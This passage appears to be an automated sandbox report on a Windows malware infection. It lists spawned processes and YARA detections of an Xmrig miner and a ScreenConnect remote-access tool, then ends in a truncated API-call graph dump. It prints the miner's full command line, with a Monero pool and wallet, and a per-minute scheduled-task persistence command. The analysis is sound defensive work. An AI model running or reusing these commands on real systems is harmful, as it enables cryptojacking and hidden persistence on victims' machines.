                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2782126972.00000159F3464000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759055860.00000159F3897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2764776666.00000159F346C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2791688116.00000159F349B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2785135937.00000159F345D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2763426209.00000159F346C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2785229702.00000159F3610000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F3898000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2778573331.00000159F3495000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2782967013.00000159F3470000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F38C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2771554480.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2770178263.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2760641243.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2765139328.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2764927688.00000159F3472000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2780772219.00000159F3897000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759580916.00000159F38CA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2777007339.00000159F3627000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759580916.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2764697915.00000159F3492000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2766881524.00000159F346E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2766881524.00000159F3479000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2782280474.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2787221813.00000159F345E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2784484927.00000159F3484000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2779479672.00000159F38FB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2759055860.00000159F3891000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2790709240.00000159F361A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2791398929.00000159F3460000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2781349798.00000159F360F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001B.00000003.2801216518.00000159F349D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:28
                                                                                                                                                                                          Start time:03:27:33
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50
                                                                                                                                                                                          Imagebase:0x23d0a940000
                                                                                                                                                                                          File size:42'800 bytes
                                                                                                                                                                                          MD5 hash:929EA1AF28AFEA2A3311FD4297425C94
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:29
                                                                                                                                                                                          Start time:03:27:33
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr-eu1.nanopool.org:10300 -u 45dXYsg6JEFipo688i2DkJFNBPbGZCjXpMYLRn8TRMpsYQH37gdzKMeHPjXrvfXAbZF32ifsRRLqEKoA1zsiskRJNyJydQG.Homeserver2 -p x --algo rx/0 --cpu-max-threads-hint=50
                                                                                                                                                                                          Imagebase:0x1b496ad0000
                                                                                                                                                                                          File size:42'800 bytes
                                                                                                                                                                                          MD5 hash:929EA1AF28AFEA2A3311FD4297425C94
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                          Target ID:30
                                                                                                                                                                                          Start time:03:27:33
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:"C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe"
                                                                                                                                                                                          Imagebase:0x670000
                                                                                                                                                                                          File size:5'649'720 bytes
                                                                                                                                                                                          MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                          • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\oZolmRBaYFkuutSgcOrBLSAQ.exe, Author: Joe Security
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:31
                                                                                                                                                                                          Start time:03:27:40
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
                                                                                                                                                                                          Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
Imagebase:0x7ff6712e0000
File size:1'180'160 bytes
MD5 hash:18BBC3FB86E902AFB59C06811A5B01F4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2922120647.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2915091882.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2915091882.0000020E49827000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2961157579.0000020E498C5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2961157579.0000020E498BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2958783527.0000020E498BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2915091882.0000020E497F7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2919365464.0000020E495EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2916180807.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2965569347.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2958783527.0000020E498F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2931991322.0000020E495E5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2916180807.0000020E495EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2958783527.0000020E498C6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2924968847.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2919365464.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2968135446.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2923367726.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2968964641.0000020E495E8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2929542126.0000020E495E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2961157579.0000020E498F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2971778971.0000020E495F3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2971339077.0000020E495EF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2918637105.0000020E497F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2918637105.0000020E4982A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2970680561.0000020E4949C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2969262618.0000020E49491000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2931335674.0000020E495E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2918637105.0000020E497F6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2920893388.0000020E495DB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:32
Start time:03:27:42
Start date:24/07/2024
Path:C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe"
Imagebase:0x180000
File size:5'649'720 bytes
MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\V6uPDVniSnRMWuLn5U9T3TGJ.exe, Author: Joe Security
Has exited:true

Target ID:34
Start time:03:27:48
Start date:24/07/2024
Path:C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe
Wow64 process (32bit):false
Commandline:"C:\Users\user\AppData\Roaming\rZ9zgPTn\fUmkyMxT\eHW8MP9M\sys_updater.exe"
Imagebase:0x7ff6712e0000
File size:1'180'160 bytes
MD5 hash:18BBC3FB86E902AFB59C06811A5B01F4
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:35
Start time:03:27:52
Start date:24/07/2024
Path:C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe"
Imagebase:0x90000
File size:5'649'720 bytes
MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\2TUSzbAUfKRfcjcMzfoV1qdi.exe, Author: Joe Security
Has exited:true

Target ID:36
Start time:03:28:01
Start date:24/07/2024
Path:C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe"
Imagebase:0x20000
File size:5'649'720 bytes
MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\ixjnzi95HfqR77bieLYCT4aJ.exe, Author: Joe Security
Has exited:true

Target ID:37
Start time:03:28:12
Start date:24/07/2024
Path:C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe"
Imagebase:0xe70000
File size:5'649'720 bytes
MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\6pkNzPZrIkyPzGNsokLQ8aZR.exe, Author: Joe Security
Has exited:true

Target ID:38
Start time:03:28:24
Start date:24/07/2024
Path:C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe
Wow64 process (32bit):false
Commandline:"C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe"
Imagebase:0x630000
File size:5'649'720 bytes
MD5 hash:E9DD0FC8F690BC7CBE71A51CF6C79F31
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\ProgramData\hQdOgl4rhYQYx3G5aYY61LEd.exe, Author: Joe Security
Has exited:true

Target ID:39
Start time:03:28:38
Start date:24/07/2024
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe" /F
Imagebase:0x950000
File size:187'904 bytes
MD5 hash:48C2FE20575769DE916F48EF0676A965
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
                                                                                                                                                                                          Start time:03:28:38
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                          Imagebase:0x7ff7699e0000
                                                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:41
                                                                                                                                                                                          Start time:03:28:40
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:42
                                                                                                                                                                                          Start time:03:28:40
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:43
                                                                                                                                                                                          Start time:03:28:52
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                          Target ID:44
                                                                                                                                                                                          Start time:03:29:00
                                                                                                                                                                                          Start date:24/07/2024
                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
                                                                                                                                                                                          Imagebase:0x530000
                                                                                                                                                                                          File size:710'144 bytes
                                                                                                                                                                                          MD5 hash:631670BEA7DD01CB347C389294714438
                                                                                                                                                                                          Has elevated privileges:false
                                                                                                                                                                                          Has administrator privileges:false
                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                          Has exited:true


Execution Graph

Execution Coverage:4.8%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:47.1%
Total number of Nodes:884
Total number of Limit Nodes:11
execution_graph: serialized node and edge listing of the execution graph (graph data, not readable as text; the listing is truncated in the source)
API calls 23326->23327 23328 5eba84 23327->23328 23329 5d1290 std::_Throw_Cpp_error 25 API calls 23328->23329 23330 5eba8f 23329->23330 23331 5d4740 std::_Throw_Cpp_error 43 API calls 23330->23331 23332 5ebc70 23331->23332 23333 5d4740 std::_Throw_Cpp_error 43 API calls 23332->23333 23334 5ebe50 23333->23334 23335 5d9de0 47 API calls 23334->23335 23338 5ebe6b 23335->23338 23336 5d4740 std::_Throw_Cpp_error 43 API calls 23337 5ec023 23336->23337 23339 5d1290 std::_Throw_Cpp_error 25 API calls 23337->23339 23338->23336 23338->23338 23340 5ec03b 23339->23340 23341 5d1290 std::_Throw_Cpp_error 25 API calls 23340->23341 23342 5ec046 23341->23342 23343 5d1290 std::_Throw_Cpp_error 25 API calls 23342->23343 23344 5ec051 23343->23344 23345 5d1290 std::_Throw_Cpp_error 25 API calls 23344->23345 23347 5ec05c 23345->23347 23346 5ec643 GetModuleHandleA 23346->23347 23347->23346 23348 5ec663 GetVersion 23347->23348 23349 5ec6c1 23348->23349 23349->23349 23350 5d4740 std::_Throw_Cpp_error 43 API calls 23349->23350 23351 5ec84d 23350->23351 23352 5d4740 std::_Throw_Cpp_error 43 API calls 23351->23352 23353 5eca30 23352->23353 23354 5d4740 std::_Throw_Cpp_error 43 API calls 23353->23354 23355 5ecbf9 23354->23355 23552 5d65f0 23355->23552 23361 5ecc2e 23362 5ecc3f 23361->23362 23363 5ef1ab 23361->23363 23701 5dd550 104 API calls 3 library calls 23362->23701 23761 5efedb 43 API calls std::_Throw_Cpp_error 23363->23761 23367 5ecc4b 23702 5e48b0 GetUserNameA 23367->23702 23369 5ecc57 23710 5e4730 44 API calls std::_Throw_Cpp_error 23369->23710 23371 5ecc63 23372 5d4740 std::_Throw_Cpp_error 43 API calls 23371->23372 23373 5ecdfa 23372->23373 23374 5d4740 std::_Throw_Cpp_error 43 API calls 23373->23374 23375 5ecfe0 23374->23375 23376 5d9de0 47 API calls 23375->23376 23377 5ecffb 23376->23377 23378 5d1290 std::_Throw_Cpp_error 25 API calls 23377->23378 23379 5ed009 23378->23379 23380 5d1290 std::_Throw_Cpp_error 25 API calls 23379->23380 23381 5ed014 23380->23381 23382 5d4740 
std::_Throw_Cpp_error 43 API calls 23381->23382 23383 5ed1a9 23382->23383 23384 5d4740 std::_Throw_Cpp_error 43 API calls 23383->23384 23385 5ed213 23384->23385 23711 5e52e0 27 API calls 3 library calls 23385->23711 23387 5ed223 23712 5e3530 27 API calls 5 library calls 23387->23712 23389 5ed230 23390 5d4740 std::_Throw_Cpp_error 43 API calls 23389->23390 23391 5ed299 23390->23391 23392 5d4740 std::_Throw_Cpp_error 43 API calls 23391->23392 23393 5ed30d 23392->23393 23713 5e52e0 27 API calls 3 library calls 23393->23713 23395 5ed31a 23714 5e3530 27 API calls 5 library calls 23395->23714 23397 5ed327 23398 5d4740 std::_Throw_Cpp_error 43 API calls 23397->23398 23399 5ed398 23398->23399 23400 5d4740 std::_Throw_Cpp_error 43 API calls 23399->23400 23401 5ed40c 23400->23401 23715 5e52e0 27 API calls 3 library calls 23401->23715 23403 5ed419 23716 5e3530 27 API calls 5 library calls 23403->23716 23405 5ed426 23406 5d4740 std::_Throw_Cpp_error 43 API calls 23405->23406 23407 5ed498 23406->23407 23408 5d4740 std::_Throw_Cpp_error 43 API calls 23407->23408 23409 5ed50c 23408->23409 23717 5e52e0 27 API calls 3 library calls 23409->23717 23411 5ed519 23718 5e3530 27 API calls 5 library calls 23411->23718 23413 5ed526 23414 5d4740 std::_Throw_Cpp_error 43 API calls 23413->23414 23415 5ed585 23414->23415 23416 5d4740 std::_Throw_Cpp_error 43 API calls 23415->23416 23417 5ed5f9 23416->23417 23719 5e52e0 27 API calls 3 library calls 23417->23719 23419 5ed606 23720 5e3530 27 API calls 5 library calls 23419->23720 23421 5ed613 23422 5d4740 std::_Throw_Cpp_error 43 API calls 23421->23422 23423 5ed672 23422->23423 23721 5d6420 23423->23721 23425 5ed684 23426 5d6420 27 API calls 23425->23426 23427 5ed69c 23426->23427 23428 5d6420 27 API calls 23427->23428 23429 5ed6b1 23428->23429 23430 5d6420 27 API calls 23429->23430 23431 5ed6c9 23430->23431 23432 5d6420 27 API calls 23431->23432 23433 5ed6e4 23432->23433 23434 5d6420 27 API calls 23433->23434 23435 5ed6ff 23434->23435 23436 
